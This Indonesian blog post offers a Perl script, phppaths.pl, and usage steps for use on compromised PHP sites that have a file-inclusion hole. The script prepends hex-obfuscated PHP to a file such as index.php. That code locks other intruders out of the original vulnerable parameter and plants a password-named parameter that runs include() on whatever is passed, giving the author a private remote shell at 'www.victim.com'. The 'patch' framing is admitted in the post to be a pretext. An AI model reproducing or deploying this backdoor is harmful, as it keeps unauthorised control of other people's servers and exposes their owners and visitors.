sebenernya gw rada bingung antara posting ne artikel, coz para netter di indonesia sebagian besar mase kurangnya kesadaran akan
cyber law di kalangan netter.
banyak yang deface web udda bangga, bikin bot, psy, and tools orang udah merajalela...
ya mungkin latar belakang pembelajaran aja gw mo posting ne artikel.... ;-)
ok,... pada bahasan kita kale ini untuk mengamankan site vulner yang writable, yach.. itung² cuman kita aja yang bisa masuk ke tu
shell inject'an and bantu² admin nge'pacth site...
alaaah,.... alasan pembenar....
ok tanpa basa-basi langsung aja langkah² nya:
1. Upload script di bawah ini di site vulner yang writable
--------[start code]-------------------------------------------------------------------------------------------
#!/usr/bin/perl
###############################################################################################
# #
# paths file php #
# file name : phppaths.pl #
# create by : dr.pluto / pluto_devils@yahoo.com #
# #
# cara manggunakan : perl phppaths.pl [bugs string] [file] #
# mass paths : find . -type f -name "*.php" -exec perl phppaths.pl [bugs string] {} \; #
# #
###############################################################################################
# set string #
###############################################################################################
$cbug = $ARGV[0]; # input bugs #
$filepaths = $ARGV[1]; # input file to paths #
$title = ".::[ Paths By: dr.pluto ]::."; # title paths #
$backdoor = "perintah"; # include (backdoor isset) #
###############################################################################################
# pesan mu (doble format php string) #
###############################################################################################
$pesan = "<center><font color=#FF0000 face=Verdana size=4><p><hr>Dilarang Keras mencoba aktifitas hacking di web
ini!!!</font><br> <font color=#00FFFF face=Verdana size=4>Patch
By: <a href=mailto:pluto_devils.com>dr.pluto<hr></a></font></center>";
###############################################################################################
$xscript = "\x3c\x3f\n\x69\x66\x20\x28\x24".$backdoor."\x20\x21\x3d\x20\x22\x22\x29\n\x7b\n
\x20\x69\x6e\x63\x6c\x75\x64\x65\x20\x28\x24".$backdoor."\x29\x3b\n\x7d\n\x20
\x24\x70\x72\x6f\x74\x65\x63\x74\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x20\x3d\x20
\x61\x72\x72\x61\x79\x28\x27".$cbug."\x27\x2c\x27\x63\x68\x64\x69\x72\x27\x29
\x3b\n\x20\x66\x6f\x72\x65\x61\x63\x68\x20\x28\x24\x70\x72\x6f\x74\x65\x63\x74
\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x20\x61\x73\x20\x24\x67\x6c\x6f\x62\x61\x6c\x29
\n\x20\x20\x20\x7b\n\x20\x20\x20\x20\x20\x20\x69\x66\x20\x28\x20\x69\x6e\x5f
\x61\x72\x72\x61\x79\x28\x24\x67\x6c\x6f\x62\x61\x6c\x20\x2c\x20\x61\x72\x72
\x61\x79\x5f\x6b\x65\x79\x73\x28\x24\x5f\x52\x45\x51\x55\x45\x53\x54\x29\x29
\x20\x7c\x7c\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x5f\x61
\x72\x72\x61\x79\x28\x24\x67\x6c\x6f\x62\x61\x6c\x20\x2c\x20\x61\x72\x72\x61
\x79\x5f\x6b\x65\x79\x73\x28\x24\x5f\x47\x45\x54\x29\x29\x20\x20\x20\x20\x20
\x7c\x7c\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x5f\x61\x72
\x72\x61\x79\x28\x24\x67\x6c\x6f\x62\x61\x6c\x20\x2c\x20\x61\x72\x72\x61\x79
\x5f\x6b\x65\x79\x73\x28\x24\x5f\x50\x4f\x53\x54\x29\x29\x20\x20\x20\x20\x7c
\x7c\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x5f\x61\x72\x72
\x61\x79\x28\x24\x67\x6c\x6f\x62\x61\x6c\x20\x2c\x20\x61\x72\x72\x61\x79\x5f
\x6b\x65\x79\x73\x28\x24\x5f\x43\x4f\x4f\x4b\x49\x45\x29\x29\x20\x20\x7c\x7c
\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x5f\x61\x72\x72\x61
\x79\x28\x24\x67\x6c\x6f\x62\x61\x6c\x20\x2c\x20\x61\x72\x72\x61\x79\x5f\x6b
\x65\x79\x73\x28\x24\x5f\x46\x49\x4c\x45\x53\x29\x29\x29\x20\n\x20\x20\x20
\x20\x20\x20\x20\x20\x20\x20\x20\x7b\n\x20\x20\x20\x20\x20\x20\x20\x20\x20
\x20\x20\x20\x20\x64\x69\x65\x28\x22\x3c\x74\x69\x74\x6c\x65\x3e$title\x3c\x2f
\x74\x69\x74\x6c\x65\x3e\x3c\x73\x74\x79\x6c\x65\x3e\x62\x6f\x64\x79\x20\x7b
\x9\x62\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x2d\x63\x6f\x6c\x6f\x72\x3a\x20
\x23\x30\x30\x30\x30\x30\x30\x3b\x7d\x20\x3c\x2f\x73\x74\x79\x6c\x65
\x3e".$pesan."\x22\x29\x3b\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7d
\n\x20\x20\x20\x7d\n\x3f\x3e\n";
$msgnull = "======================\npath web php ver 0.1\ncreate
by : dr.pluto\n======================\ncara panggunaan : perl phppaths.pl [bug string]
[file]\nContoh:\n perl phppaths.pl page index.php \n";
if (! $cbug)
{
die($msgnull);
};
if (! $filepaths)
{
die($msgnull);
};
open(TEMP, "> /tmp/plutoganteng")|| die "ada yang salah: $!" ;
printf TEMP $xscript ;
close(TEMP);
system ('cat /tmp/plutoganteng '.$filepaths.' > /tmp/pathsweb');
system ('cat /tmp/pathsweb > '.$filepaths);
system ('rm -f /tmp/pathsweb /tmp/plutoganteng');
print "======================\n";
print "path web php ver 0.1\n";
print "create by : dr.pluto\n";
print "======================\n";
print "info :\n";
print "Bug string :".$cbug."\n";
print "File to path :".$filepaths."\n";
#EOF
--------[Garis ini jangan di ketik lo bo]--------------------------------------------------------------------------------------------
untuk menjalankanya sintax nya sebagai berikut:
perl phppaths.pl [bugs string] [file]
missal halaman yang akan di pacth index.php and target nya www.victim.com/index.php?page=[evil script]
edit $backdoor ="password kamu" biar kamu aja yang bisa masuk di tu shell
misal $backdoor ="pirate";
untuk menjalankanya :
ssh.0-1$perl phppaths.pl page index.php
======================
path web php ver 0.1
create by : dr.pluto
======================
info :
Bug string : page
File to path : index.php
untuk masuk ke shell kamu sekarang udah berubah url nya menjadi:
www.victim.com/index.php?pirate=[evil script]
sekian.... semoga berguna....
0 comments:
Post a Comment